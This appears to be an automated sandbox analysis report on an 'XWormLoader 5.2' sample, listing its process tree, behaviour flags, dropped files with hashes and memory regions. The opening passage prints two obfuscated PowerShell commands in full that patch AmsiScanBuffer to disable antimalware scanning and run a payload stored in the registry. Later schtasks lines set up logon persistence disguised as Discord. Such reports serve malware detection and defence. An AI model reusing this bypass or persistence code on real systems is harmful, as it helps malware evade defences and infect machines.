''+[Char](101)+''+[Char](100)+'');Write-Output $LaJSxrnlxpL.CreateType();}$nuiIxRcZpRTVn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+'t'+''+'e'+'m.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+'f'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+'s'+'af'+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+'e'+'t'+''+[Char](104)+''+'o'+'ds');$HCvJfvstKGVxzk=$nuiIxRcZpRTVn.GetMethod('Get'+[Char](80)+'r'+'o'+''+[Char](99)+''+'A'+''+[Char](100)+'d'+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$yQmYBCNmLyMqauQBXbq=XKnSftNraHzw @([String])([IntPtr]);$dzigsBsmLSAhHhqNqxOrKv=XKnSftNraHzw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rjJqOCeTVAS=$nuiIxRcZpRTVn.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$EfnpToWseRKoHZ=$HCvJfvstKGVxzk.Invoke($Null,@([Object]$rjJqOCeTVAS,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+'a'+'ryA')));$SnpphpTJMhjyWrkUp=$HCvJfvstKGVxzk.Invoke($Null,@([Object]$rjJqOCeTVAS,[Object]('V'+'i'+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+'t')));$OFjNWEJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EfnpToWseRKoHZ,$yQmYBCNmLyMqauQBXbq).Invoke('a'+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$HIwVOszMPDtyLrIiX=$HCvJfvstKGVxzk.Invoke($Null,@([Object]$OFjNWEJ,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+'a'+''+'n'+'Bu'+[Char](102)+''+'f'+''+[Char](101)+'r')));$KfifdtTYcK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SnpphpTJMhjyWrkUp,$dzigsBsmLSAhHhqNqxOrKv).Invoke($HIwVOszMPDtyLrIiX,[uint32]8,4,[ref]$KfifdtTYcK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HIwVOszMPDtyLrIiX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SnpphpTJMhjyWrkUp,$dzigsBsmLSAhHhqNqxOrKv).Invoke($HIwVOszMPDtyLrIiX,[uint32]8,0x20,[ref]$KfifdtTYcK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OF'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'s'+[Char](116)+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:axNCrTzuDeWo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lVCxHtFrjlkTWl,[Parameter(Position=1)][Type]$OMGUoTknDe)$gZSQTHpiWsu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'le',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+'s,'+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'e'+'a'+'le'+'d'+''+','+'A'+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$gZSQTHpiWsu.DefineConstructor(''+'R'+'T'+'S'+''+'p'+'e'+'c'+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+'id'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lVCxHtFrjlkTWl).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+'i'+[Char](109)+''+'e'+''+','+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$gZSQTHpiWsu.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+'u'+'b'+'l'+'i'+[Char](99)+','+[Char](72)+'id'+'e'+'By'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+'l',$OMGUoTknDe,$lVCxHtFrjlkTWl).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me'+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');Write-Output $gZSQTHpiWsu.CreateType();}$bXwhHPsHFYlhh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+'s'+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+'2'+'.U'+'n'+''+'s'+'a'+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$EAdbJeCTXeSHWO=$bXwhHPsHFYlhh.GetMethod(''+[Char](71)+'e'+'t'+'P'+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BUgSiZzHoHJytiRfYQU=axNCrTzuDeWo @([String])([IntPtr]);$qjcFnZPXbmNEKbXFgElzTo=axNCrTzuDeWo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rFILPCHdADp=$bXwhHPsHFYlhh.GetMethod('G'+'e'+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'leH'+'a'+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'nel'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$hxjtumdjJOCnfW=$EAdbJeCTXeSHWO.Invoke($Null,@([Object]$rFILPCHdADp,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$dKeorIkmebIeIrkxV=$EAdbJeCTXeSHWO.Invoke($Null,@([Object]$rFILPCHdADp,[Object](''+[Char](86)+'i'+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$fNmpjDQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxjtumdjJOCnfW,$BUgSiZzHoHJytiRfYQU).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$cFGcReAVZDtCULlRX=$EAdbJeCTXeSHWO.Invoke($Null,@([Object]$fNmpjDQ,[Object]('A'+'m'+'s'+'i'+'S'+[Char](99)+'a'+[Char](110)+'Bu'+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$QyhVTadAew=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dKeorIkmebIeIrkxV,$qjcFnZPXbmNEKbXFgElzTo).Invoke($cFGcReAVZDtCULlRX,[uint32]8,4,[ref]$QyhVTadAew);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cFGcReAVZDtCULlRX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dKeorIkmebIeIrkxV,$qjcFnZPXbmNEKbXFgElzTo).Invoke($cFGcReAVZDtCULlRX,[uint32]8,0x20,[ref]$QyhVTadAew);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'WA'+'R'+''+'E'+'').GetValue('$'+[Char](55)+'7'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Discord\Discord.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "Discord" /f5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9kfq0615SnBy.bat" "5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost6⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3592 -s 3846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3592 -s 3926⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Discord.exe" /tr "'C:\Users\Admin\AppData\Roaming\Discord\Discord.exe'" /sc onlogon /rl HIGHEST5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77svchost.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\svchost.exe'" /sc onlogon /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 9004⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4492 -ip 44922⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3592 -ip 35922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3592 -ip 35922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.56898347-c3a7-440d-aef2-84c3787c9373.tmp.csvFilesize
36KB
MD542831c77cd8fe5482dd157b98fba2ad3
SHA149ada71a641942b425d428ccbb586bd82e3adc25
SHA256bec797bf4ee01cb85e6b28d9dd441f83f88632a80d6be5e1dfab0e767fb9b869
SHA512576d442cfc13b18f9f78a0e3ed2e6af5f746d8dc5722aab2afd4521b55adacbdf11fde491a305d6b756c6dca60be6715be87dd2aff54f0e93a483ff760c39a48
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6aac17cc-d02f-4b14-9c6e-f94d750901d1.tmp.txtFilesize
13KB
MD548844630c4e4b04142c185ead67eb0c4
SHA1ded0f6c4a547e11dd328678de5fa55aaa9162b53
SHA25628ba7090eaee7f29c06f6de25c65dda0be3a3c8ecdd93bc6cbf6613522e18b9b
SHA5124e4b324b65a7823345b7ad9d2c99383d85f561e6b91fad2794f073cb7c00fe17f0293a23a8c59a7bed919644fcf26248516ad7963bac75bd95f600dd30d61e86
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.997871a2-18a6-40ea-9ff9-861a991059f5.tmp.txtFilesize
13KB
MD5cdbea659e9ce03ce7fb4b26e88aff8de
SHA18d22fc2c66c929b22f3d7e47b885361cde652a27
SHA256ab1aab9e09ba11f36b7b93b8f209c0c7b6e30bf2c4c2c3ff463f6cea4e2efd2f
SHA5129fb54bc925e69a9973b5f1a96d7325c5235273a96f4f7bb33819ba5d9815ca67aed034c2dca5cf74ca04cf173b510c8da97bd9bce63bac6829b81fee26d9dbce
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.e4bf102d-117d-43a7-8849-e159705d68cb.tmp.csvFilesize
36KB
MD53b2022e46d79bc869e71c531a7f3d951
SHA13a33a7b65b5bf34a4e021dea2658f7c6ea949045
SHA2561f61ea8a795912b92f5e2f6134158d9af58f0e23feaf3b24a46fe8231bdf7b15
SHA5129bd8364bf175032a0f727a361a7da1367cc9d243f631eeded0a12865eca7f81f163258c49e9689c4e696e55ddda9c59ae6c3be1b6384a5f768df5b887bd758dc
-
C:\Users\Admin\AppData\Local\Temp\9kfq0615SnBy.batFilesize
264B
MD5397e18286bfb5f61ccc38d1821f8c907
SHA12b3391a9f37b94bf0a8ff5f9dab7efb2e655db8f
SHA256180920884b98cd076c3f593ded1f7a9b7e6960b7e32c5e719004140bcf6d4ede
SHA51241adeabbdc89114d6ab660699f1877d8860f186a8d47e38f9d5e7fc171c1ece2a20342c4a593c2cee5d4eb53b35de5d7255a459edb7b149c5449325f31652f7b
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exeFilesize
109KB
MD5f3b2ec58b71ba6793adcc2729e2140b1
SHA1d9e93a33ac617afe326421df4f05882a61e0a4f2
SHA2562d74eb709aea89a181cf8dfcc7e551978889f0d875401a2f1140487407bf18ae
SHA512473edcaba9cb8044e28e30fc502a08a648359b3ed0deba85e559fe76b484fc8db0fc2375f746851623e30be33da035cec1d6038e1fcf4842a2afb6f9cd397495
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeFilesize
409KB
MD561e7a9eaef04c1617ffff35c0287d234
SHA15a6ffedd75ac4e07594ccb6974ee8684d5128a35
SHA256b2b4be7ae20431c88115d561a6886f22ab3416595338e7e2eb361f0bb428b987
SHA5128ee9fd8d8631dd611ff539fc35ad4c26f7bfb4b8a26de12e03f48f3b87a7f18198c37ec187a1e8393aafb88e468e74c734cafcaf72f73b0afc55822762d767e6
-
C:\Windows\Temp\__PSScriptPolicyTest_y4z5e25b.fwl.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5bb7d9cd87343b2c81c21c7b27e6ab694
SHA127475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b
-
memory/396-55-0x0000000006E80000-0x0000000006E8A000-memory.dmpFilesize
40KB
-
memory/420-105-0x000001D989000000-0x000001D98902B000-memory.dmpFilesize
172KB
-
memory/420-112-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmpFilesize
64KB
-
memory/420-111-0x000001D989000000-0x000001D98902B000-memory.dmpFilesize
172KB
-
memory/456-116-0x00000194FEF70000-0x00000194FEF9B000-memory.dmpFilesize
172KB
-
memory/640-70-0x000002331C250000-0x000002331C275000-memory.dmpFilesize
148KB
-
memory/640-71-0x000002331C280000-0x000002331C2AB000-memory.dmpFilesize
172KB
-
memory/640-72-0x000002331C280000-0x000002331C2AB000-memory.dmpFilesize
172KB
-
memory/640-79-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmpFilesize
64KB
-
memory/640-78-0x000002331C280000-0x000002331C2AB000-memory.dmpFilesize
172KB
-
memory/708-83-0x0000024CE3800000-0x0000024CE382B000-memory.dmpFilesize
172KB
-
memory/708-90-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmpFilesize
64KB
-
memory/708-89-0x0000024CE3800000-0x0000024CE382B000-memory.dmpFilesize
172KB
-
memory/996-94-0x0000023CC8DA0000-0x0000023CC8DCB000-memory.dmpFilesize
172KB
-
memory/996-100-0x0000023CC8DA0000-0x0000023CC8DCB000-memory.dmpFilesize
172KB
-
memory/996-101-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmpFilesize
64KB
-
memory/1368-0-0x00007FF84CE13000-0x00007FF84CE15000-memory.dmpFilesize
8KB
-
memory/1368-723-0x00007FF84CE10000-0x00007FF84D8D2000-memory.dmpFilesize
10.8MB
-
memory/1368-24-0x00007FF84CE10000-0x00007FF84D8D2000-memory.dmpFilesize
10.8MB
-
memory/1368-1-0x0000000000ED0000-0x0000000000F28000-memory.dmpFilesize
352KB
-
memory/1612-56-0x0000014ED4E20000-0x0000014ED4E4A000-memory.dmpFilesize
168KB
-
memory/1612-57-0x00007FF86DC60000-0x00007FF86DE69000-memory.dmpFilesize
2.0MB
-
memory/1612-48-0x0000014ED4DC0000-0x0000014ED4DE2000-memory.dmpFilesize
136KB
-
memory/1612-58-0x00007FF86CC60000-0x00007FF86CD1D000-memory.dmpFilesize
756KB
-
memory/2356-65-0x00007FF86DC60000-0x00007FF86DE69000-memory.dmpFilesize
2.0MB
-
memory/2356-67-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
